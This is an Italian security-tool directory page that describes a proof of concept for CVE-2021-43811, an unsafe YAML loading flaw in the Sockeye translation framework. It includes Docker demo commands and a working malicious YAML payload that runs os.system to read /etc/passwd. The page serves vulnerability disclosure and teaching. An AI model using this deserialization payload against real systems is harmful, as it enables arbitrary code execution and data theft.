Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-43811 — awslabs/sockeye Iniezione di codice tramite caricamento non sicuro di YAML CVE-2021-43811 | Kitploit
Strumenti/GitHubGitHub/s-index/cve-2021-43811
Generazione di PayloadAnalisi delle VulnerabilitàAnalisi del CodiceExploitPaper e RicercaApprendimento e Formazione
GitHubs-index/cve-2021-43811

CVE-2021-43811

awslabs/sockeye Iniezione di codice tramite caricamento non sicuro di YAML CVE-2021-43811

Vedi Repository
22494 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-43811

awslabs/sockeye Iniezione di codice tramite caricamento non sicuro di YAML CVE-2021-43811

Descrizione NVD

Sockeye è un framework open-source sequence-to-sequence per la traduzione automatica neurale basato su PyTorch. Sockeye utilizza YAML per memorizzare su disco le configurazioni di modelli e dati. Le versioni precedenti alla 2.3.24 utilizzano un caricamento non sicuro di YAML, che può essere indotto a eseguire codice arbitrario incorporato nei file di configurazione. Un attaccante può aggiungere codice dannoso al file di configurazione di un modello addestrato e tentare di convincere gli utenti a scaricarlo ed eseguirlo. Se gli utenti eseguono il modello, il codice incorporato verrà eseguito localmente. Il problema è stato risolto nella versione 2.3.24.

Demo

cve-2021-43811

Configurazione

  1. Crea un'immagine da un Dockerfile
root@kitploit:~
docker build -t cve-2021-43811 .
  1. Esegui python main.py in un nuovo container
root@kitploit:~
docker run -it --rm cve-2021-43811

output di /etc/passwd

root@kitploit:~
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin -- snip --

output-image

Payload PoC

malicious.yml

root@kitploit:~
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"

Riferimenti

  • https://github.com/awslabs/sockeye/security/advisories/GHSA-ggmr-44cv-24pm
Scarica lo strumento